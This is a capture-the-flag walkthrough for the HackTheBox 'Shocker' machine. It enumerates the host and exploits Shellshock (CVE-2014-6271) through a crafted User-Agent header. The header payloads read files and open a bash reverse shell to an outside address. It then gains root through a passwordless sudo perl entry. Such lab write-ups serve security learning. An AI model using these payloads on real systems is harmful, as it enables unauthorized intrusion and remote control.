HackTheBox Shocker Walkthrough

Enjoy reading my HTB Shocker Writeup

Information Gathering

Let's begin with a basic nmap scan to gain information about the services running on HTB Shocker.

sudo nmap -p 1-5000 -sV -sC -v 10.10.10.56

This reveals two services:

The website contains some basic HTML code to display an image, nothing else.

Using gobuster we can search for hidden directories and files:

gobuster dir -u http://10.10.10.56 -w Lists/gobuster/directory.txt

This didn't return any directories and gobuster had some errors with displaying custom status codes so I switched to dirbuster. Dirbuster then revealed the /cgi-bin/ directory with the response code 403 which means we do not have access to it.

Now that we know that this directory exists, let's try to find files through brute-forcing instead of indexing using standard extensions and gobuster or dirbuster:

gobuster dir -u http://10.10.10.56/cgi-bin/ -x txt,sh,pl,tar.gz,bak -w /Lists/gobuster/directory.txt

Through that I found a file called user.sh that included the following content:

0Content-Type: text/plain
1
2Just an uptime test script
3
4 18:51:55 up 53 min,  0 users,  load average: 1.16, 0.68, 0.35

ShellShock

Shellshock is a vulnerability discovered in Septemer 2014 that allows arbitrary code execution on servers that use Bash for processing requests.

As we have a bash script lying on the webserver and the name is HackTheBox Shock, this host might be vulnerable to CVE-2014-6271.

nmap's scripting engine contains a script (http-shellshock.nse) which we are going to use for further investigation.

With nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56 we can let nmap check whether the target is vulnerable or not.

According to nmap it should be exploitable:

 0PORT   STATE SERVICE VERSION
 180/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 2|_http-server-header: Apache/2.4.18 (Ubuntu)
 3| http-shellshock: 
 4|   VULNERABLE:
 5|   HTTP Shellshock vulnerability
 6|     State: VULNERABLE (Exploitable)
 7|     IDs:  CVE:CVE-2014-6271
 8|       This web application might be affected by the vulnerability known
 9|       as Shellshock. It seems the server is executing commands injected
10|       via malicious HTTP headers.

I configured a redirect on burpsuite to take a look at the exact request made by nmap and the response of the webserver:

db0db143fc8dfc2bb244c9a04f1d8121.png

As we only need one of them I removed Cookie and Referer to keep the request a bit cleaner.

I then rewrote the payload to: { :;}; echo; ls which resulted in a 200 but didn't output anything.

Changing ls to /bin/ls then worked.

Using ls you are able to navigate through the filesystem and with the following payload you can read the userflag:

User-Agent: () { :;}; echo; /bin/cat ../../../home/shelly/user.txt

Another way would be gaining foothold first by gaining a reverse shell; this can be done with this payload:

User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/10.10.16.180/4545 0>&1

Privilege Escalation

After obtaining the reverse shell I checked if there are executables that we are allowed to execute as root without a password using: sudo -l.

0shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
1sudo -l
2Matching Defaults entries for shelly on Shocker:
3    env_reset, mail_badpass,
4    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
5
6User shelly may run the following commands on Shocker:
7    (root) NOPASSWD: /usr/bin/perl

perl can be used for escalating our privileges (gtfobins here)

e.g. with: sudo perl -e 'exec "/bin/bash";'

Finally, you are able to navigate into the root directory and take a look at the system flag.

Tags:

HTB, HackTheBox, Shocker, Walkthrough